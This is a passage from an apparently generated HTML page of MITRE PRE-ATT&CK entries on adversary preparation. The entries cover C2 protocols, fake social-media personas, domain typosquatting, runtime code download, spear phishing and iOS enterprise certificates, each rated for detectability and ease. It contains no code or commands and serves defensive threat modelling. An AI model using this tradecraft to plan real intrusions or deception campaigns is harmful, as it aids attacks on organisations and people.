<p>Detectable by Common Defenses explanation: Depends on service. Some are easy to detect, but are hard to trace (e.g., [<a href="https://torproject.org" class="bare">https://torproject.org</a> TOR]).</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Easy access to anonymizers, quasi-anonymous services like remailers, [<a href="https://torproject.org" class="bare">https://torproject.org</a> TOR], relays, burner phones, etc.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1500. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1083">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1083</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_c2_protocol_development_pre_t1129"><a class="anchor" href="#_c2_protocol_development_pre_t1129"></a><a class="link" href="#_c2_protocol_development_pre_t1129">C2 protocol development - PRE-T1129</a></h3>
<div class="paragraph">
<p>Command and Control (C2 or C&amp;C) is a method by which the adversary communicates with malware. An adversary may use a variety of protocols and methods to execute C2 such as a centralized server, peer to peer, IRC, compromised web sites, or even social media. (Citation: HAMMERTOSS2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary will likely use code repositories, but development will be performed on their local systems.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: C2 over commonly used and permitted protocols provides the necessary cover and access.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1501. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1129">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1129</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_build_social_network_persona_pre_t1118"><a class="anchor" href="#_build_social_network_persona_pre_t1118"></a><a class="link" href="#_build_social_network_persona_pre_t1118">Build social network persona - PRE-T1118</a></h3>
<div class="paragraph">
<p>For attacks incorporating social engineering the utilization of an on-line persona is important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites ([<a href="https://www.facebook.com" class="bare">https://www.facebook.com</a> Facebook], [<a href="https://www.linkedin.com" class="bare">https://www.linkedin.com</a> LinkedIn], [<a href="https://twitter.com" class="bare">https://twitter.com</a> Twitter], [<a href="https://plus.google.com" class="bare">https://plus.google.com</a> Google+], etc.). (Citation: NEWSCASTER2014) (Citation: BlackHatRobinSage) (Citation: RobinSageInterview)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Unless there is some threat intelligence reporting, these users are hard to differentiate.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Performing activities like typical users, but with specific intent in mind.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1502. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1118">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1118</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_task_requirements_pre_t1017"><a class="anchor" href="#_task_requirements_pre_t1017"></a><a class="link" href="#_task_requirements_pre_t1017">Task requirements - PRE-T1017</a></h3>
<div class="paragraph">
<p>Once divided into the most granular parts, analysts work with collection managers to task the collection management system with requirements and sub-requirements. (Citation: Heffter) (Citation: JP2-01)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1503. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1017">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1017</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_buy_domain_name_pre_t1105"><a class="anchor" href="#_buy_domain_name_pre_t1105"></a><a class="link" href="#_buy_domain_name_pre_t1105">Buy domain name - PRE-T1105</a></h3>
<div class="paragraph">
<p>Domain Names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. (Citation: PWCSofacy2014)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This is by design captured in public registration logs. Various tools and services exist to track/query/monitor domain name registration information.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Proliferation of DNS TLDs and registrars. Adversary may choose domains that are similar to legitimate domains (aka "domain typosquatting" or homoglyphs).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1504. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1105">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1105</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_technology_usage_patterns_pre_t1041"><a class="anchor" href="#_identify_technology_usage_patterns_pre_t1041"></a><a class="link" href="#_identify_technology_usage_patterns_pre_t1041">Identify technology usage patterns - PRE-T1041</a></h3>
<div class="paragraph">
<p>Technology usage patterns include identifying if users work offsite, connect remotely, or other possibly less restricted/secured access techniques. (Citation: SANSRemoteAccess)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Physical observations, OSINT for remote access instructions, and other techniques are not detectable.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Determine if users work offsite, connect remotely, or other possibly less restricted/secured access techniques.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1505. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1041">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1041</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_business_relationships_pre_t1049"><a class="anchor" href="#_identify_business_relationships_pre_t1049"></a><a class="link" href="#_identify_business_relationships_pre_t1049">Identify business relationships - PRE-T1049</a></h3>
<div class="paragraph">
<p>Business relationship information includes the associates of a target and may be discovered via social media sites such as [<a href="https://www.linkedin.com" class="bare">https://www.linkedin.com</a> LinkedIn] or public press releases announcing new partnerships between organizations or people (such as key hire announcements in industry articles). This information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: RSA-APTRecon) (Citation: Scasny2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Searching publicly available sources that cannot be monitored by a defender. Much of this information is widely known and difficult to obscure.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Made easier by today&#8217;s current social media.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1506. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1049">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1049</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_runtime_code_download_and_execution_pre_t1172"><a class="anchor" href="#_runtime_code_download_and_execution_pre_t1172"></a><a class="link" href="#_runtime_code_download_and_execution_pre_t1172">Runtime code download and execution - PRE-T1172</a></h3>
<div class="paragraph">
<p>Many mobile devices are configured to only allow applications to be installed from the mainstream vendor app stores (e.g., Apple App Store and Google Play Store). These app stores scan submitted applications for malicious behavior. However, applications can evade these scans by downloading and executing new code at runtime that was not included in the original application package. (Citation: Fruit vs Zombies) (Citation: Android Hax) (Citation: Execute This!) (Citation: HT Fake News App) (Citation: Anywhere Computing kill 2FA) (Citation: Android Security Review 2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Third-party mobile application security analysis services exist that scan for use of these techniques in iOS and Android applications. Additionally, Google specifically calls out the ability to "identify attacks that require connection to a server and dynamic downloading of code" in its Android Security 2015 Year in Review report. However, many applications use these techniques as part of their legitimate operation, increasing the difficulty of detecting or preventing malicious use.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Runtime code execution techniques and examples of their use are widely documented on both Apple iOS and Android.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1507. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1172">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1172</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_assess_current_holdings_needs_and_wants_pre_t1013"><a class="anchor" href="#_assess_current_holdings_needs_and_wants_pre_t1013"></a><a class="link" href="#_assess_current_holdings_needs_and_wants_pre_t1013">Assess current holdings, needs, and wants - PRE-T1013</a></h3>
<div class="paragraph">
<p>Analysts assess current information available against requirements that outline needs and wants as part of the research baselining process to begin satisfying a requirement. (Citation: CyberAdvertisingChar) (Citation: CIATradecraft) (Citation: ForensicAdversaryModeling) (Citation: CyberAdversaryBehavior)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1508. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1013">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1013</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obtain_templates_branding_materials_pre_t1058"><a class="anchor" href="#_obtain_templates_branding_materials_pre_t1058"></a><a class="link" href="#_obtain_templates_branding_materials_pre_t1058">Obtain templates/branding materials - PRE-T1058</a></h3>
<div class="paragraph">
<p>Templates and branding materials may be used by an adversary to add authenticity to social engineering message. (Citation: Scasny2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Adversary may download templates or branding from publicly available presentations that the defender can&#8217;t monitor.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Some branding information is publicly available when a corporation publishes their briefings to the internet which provides insight into branding information and template materials. An exhaustive list of templating and branding is likely not available on the internet.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1509. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1058">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1058</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dynamic_dns_pre_t1088"><a class="anchor" href="#_dynamic_dns_pre_t1088"></a><a class="link" href="#_dynamic_dns_pre_t1088">Dynamic DNS - PRE-T1088</a></h3>
<div class="paragraph">
<p>Dynamic DNS is a method of automatically updating a name in the DNS system. Providers offer this rapid reconfiguration of IPs to hostnames as a service. (Citation: DellMirage2012)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defender will not know at first use what is valid or hostile traffic without more context. It is possible, however, for defenders to see if the PTR record for an address is hosted by a known DDNS provider. There is potential to assign some level of risk based on this.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Flexible and re-configurable command and control servers, along with deniable ownership and reduced cost of ownership.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1510. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1088">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1088</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_spear_phishing_messages_with_malicious_links_pre_t1146"><a class="anchor" href="#_spear_phishing_messages_with_malicious_links_pre_t1146"></a><a class="link" href="#_spear_phishing_messages_with_malicious_links_pre_t1146">Spear phishing messages with malicious links - PRE-T1146</a></h3>
<div class="paragraph">
<p>Emails with malicious links are designed to get a user to click on the link in order to deliver malware payloads. (Citation: GoogleDrive Phishing) (Citation: RSASEThreat)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Yes</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Defenders can implement mechanisms to analyze links and identify levels of concerns. However, the adversary has the advantage of creating new links or finding ways to obfuscate the link so that common detection lists can not identify it. Detection of a malicious link could be identified once the file has been downloaded.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Sending emails is trivial and expected. The adversary needs to ensure links don&#8217;t get tampered, removed, or flagged as a previously black-listed site.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1511. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1146">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1146</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hardware_or_software_supply_chain_implant_pre_t1142"><a class="anchor" href="#_hardware_or_software_supply_chain_implant_pre_t1142"></a><a class="link" href="#_hardware_or_software_supply_chain_implant_pre_t1142">Hardware or software supply chain implant - PRE-T1142</a></h3>
<div class="paragraph">
<p>During production and distribution, the placement of software, firmware, or a CPU chip in a computer, handheld, or other electronic device that enables an adversary to gain illegal entrance. (Citation: McDRecall) (Citation: SeagateMaxtor)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: The number of elements and components in a supply chain of HW or SW is vast and detecting an implant is complex for SW, but more complex for HW.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Access to the supply chain by an adversary can be a challenging endeavor, depending on what element is attempting to be subverted.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1512. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1142">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1142</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_secondary_level_tactical_element_pre_t1021"><a class="anchor" href="#_determine_secondary_level_tactical_element_pre_t1021"></a><a class="link" href="#_determine_secondary_level_tactical_element_pre_t1021">Determine secondary level tactical element - PRE-T1021</a></h3>
<div class="paragraph">
<p>The secondary level tactical element the adversary seeks to attack is the specific network or area of a network that is vulnerable to attack. Within the corporate network example, the secondary level tactical element might be a SQL server or a domain controller with a known vulnerability. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12 &#174;) (Citation: DoD Cyber 2015)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1513. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1021">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1021</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_upload_install_and_configure_software_tools_pre_t1139"><a class="anchor" href="#_upload_install_and_configure_software_tools_pre_t1139"></a><a class="link" href="#_upload_install_and_configure_software_tools_pre_t1139">Upload, install, and configure software/tools - PRE-T1139</a></h3>
<div class="paragraph">
<p>An adversary may stage software and tools for use during later stages of an attack. The software and tools may be placed on systems legitimately in use by the adversary or may be placed on previously compromised infrastructure. (Citation: APT1) (Citation: RedOctober)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Infrastructure is (typically) outside of control/visibility of defender and as such as tools are staged for specific campaigns, it will not be observable to those being attacked.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Adversary has control of the infrastructure and will likely be able to add/remove tools to infrastructure, whether acquired via hacking or standard computer acquisition (e.g., [<a href="https://aws.amazon.com" class="bare">https://aws.amazon.com</a> AWS], VPS providers).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1514. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1139">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1139</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_assign_kits_kiqs_into_categories_pre_t1005"><a class="anchor" href="#_assign_kits_kiqs_into_categories_pre_t1005"></a><a class="link" href="#_assign_kits_kiqs_into_categories_pre_t1005">Assign KITs/KIQs into categories - PRE-T1005</a></h3>
<div class="paragraph">
<p>Leadership organizes Key Intelligence Topics (KITs) and Key Intelligence Questions (KIQs) into three types of categories and creates more if necessary. An example of a description of key players KIT would be when an adversary assesses the cyber defensive capabilities of a nation-state threat actor. (Citation: Herring1999)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Normally, defender is unable to detect. Few agencies and commercial organizations may have unique insights.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Normal aspect of adversary planning lifecycle. May not be done by all adversaries.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1515. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1005">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1005</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_analyze_application_security_posture_pre_t1070"><a class="anchor" href="#_analyze_application_security_posture_pre_t1070"></a><a class="link" href="#_analyze_application_security_posture_pre_t1070">Analyze application security posture - PRE-T1070</a></h3>
<div class="paragraph">
<p>An adversary can probe a victim&#8217;s network to determine configurations. The configurations may provide opportunities to route traffic through the network in an undetected or less detectable way. (Citation: Li2014ExploitKits) (Citation: RecurlyGHOST)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: This can be done offline after the data has been collected.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Analyze technical scanning results to identify weaknesses in the configuration or architecture. Many of the common tools highlight these weakness automatically (e.g., software security scanning tools or published vulnerabilities about commonly used libraries).</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1516. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1070">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1070</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_targeted_social_media_phishing_pre_t1143"><a class="anchor" href="#_targeted_social_media_phishing_pre_t1143"></a><a class="link" href="#_targeted_social_media_phishing_pre_t1143">Targeted social media phishing - PRE-T1143</a></h3>
<div class="paragraph">
<p>Sending messages through social media platforms to individuals identified as a target. These messages may include malicious attachments or links to malicious sites or they may be designed to establish communications for future actions. (Citation: APT1) (Citation: Nemucod Facebook)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Extremely hard to identify (in the launch phase) what message via social media is hostile versus what is not. Increased use of encrypted communications increases the difficulty average defender&#8217;s have in detecting use of this technique.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Sending messages to individuals identified as a target follows normal tradecraft for using social media.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1517. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1143">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1143</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_obtain_apple_ios_enterprise_distribution_key_pair_and_certificate_pre_t1169"><a class="anchor" href="#_obtain_apple_ios_enterprise_distribution_key_pair_and_certificate_pre_t1169"></a><a class="link" href="#_obtain_apple_ios_enterprise_distribution_key_pair_and_certificate_pre_t1169">Obtain Apple iOS enterprise distribution key pair and certificate - PRE-T1169</a></h3>
<div class="paragraph">
<p>The adversary can obtain an Apple iOS enterprise distribution key pair and certificate and use it to distribute malicious apps directly to Apple iOS devices without the need to publish the apps to the Apple App Store (where the apps could potentially be detected). (Citation: Apple Developer Enterprise Porgram Apps) (Citation: Fruit vs Zombies) (Citation: WIRELURKER) (Citation: Sideloading Change)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: Partial</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Starting in iOS 9, Apple has changed the user interface when installing apps to better indicate to users the potential implications of installing apps signed by an enterprise distribution key rather than from Apple&#8217;s App Store and to make it more difficult for users to inadvertently install these apps. Additionally, enterprise management controls are available that can be imposed to prevent installing these apps. Also, enterprise mobility management / mobile device management (EMM/MDM) systems can be used to scan for the presence of undesired apps on enterprise mobile devices.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: No</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Apple requires a DUNS number, corporate documentation, and $299 to obtain an enterprise distribution certificate. Additionally, Apple revokes certificates if they discover malicious use. However, the enrollment information could be falsified to Apple by an adversary, or an adversary could steal an existing enterprise distribution certificate (and the corresponding private key) from a business that already possesses one.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1518. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1169">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1169</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_determine_3rd_party_infrastructure_services_pre_t1037"><a class="anchor" href="#_determine_3rd_party_infrastructure_services_pre_t1037"></a><a class="link" href="#_determine_3rd_party_infrastructure_services_pre_t1037">Determine 3rd party infrastructure services - PRE-T1037</a></h3>
<div class="paragraph">
<p>Infrastructure services includes the hardware, software, and network resources required to operate a communications environment. This infrastructure can be managed by a 3rd party rather than being managed by the owning organization. (Citation: FFIECAwareness) (Citation: Zetter2015Threats)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: The data is passive in nature or not controlled by the defender, so it is hard to identify when an adversary is getting or analyzing the data.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Based on what the 3rd party infrastructure is, there are many tell tail signs which indicate it is hosted by a 3rd party, such as ASN data, MX or CNAME pointers or IP addresses</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1519. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1037">https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1037</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_identify_resources_required_to_build_capabilities_pre_t1125"><a class="anchor" href="#_identify_resources_required_to_build_capabilities_pre_t1125"></a><a class="link" href="#_identify_resources_required_to_build_capabilities_pre_t1125">Identify resources required to build capabilities - PRE-T1125</a></h3>
<div class="paragraph">
<p>As with legitimate development efforts, different skill sets may be required for different phases of an attack. The skills needed may be located in house, can be developed, or may need to be contracted out. (Citation: APT1)</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses: No</p>
</div>
<div class="paragraph">
<p>Detectable by Common Defenses explanation: Recruitment is, by its nature, either clandestine or off the record.</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary: Yes</p>
</div>
<div class="paragraph">
<p>Difficulty for the Adversary explanation: Like target organizations, adversary organizations are competing to identify and hire top technical talent. Training less technical staff is also a viable option.</p>
</div>
<table class="tableblock frame-all grid-all spread">
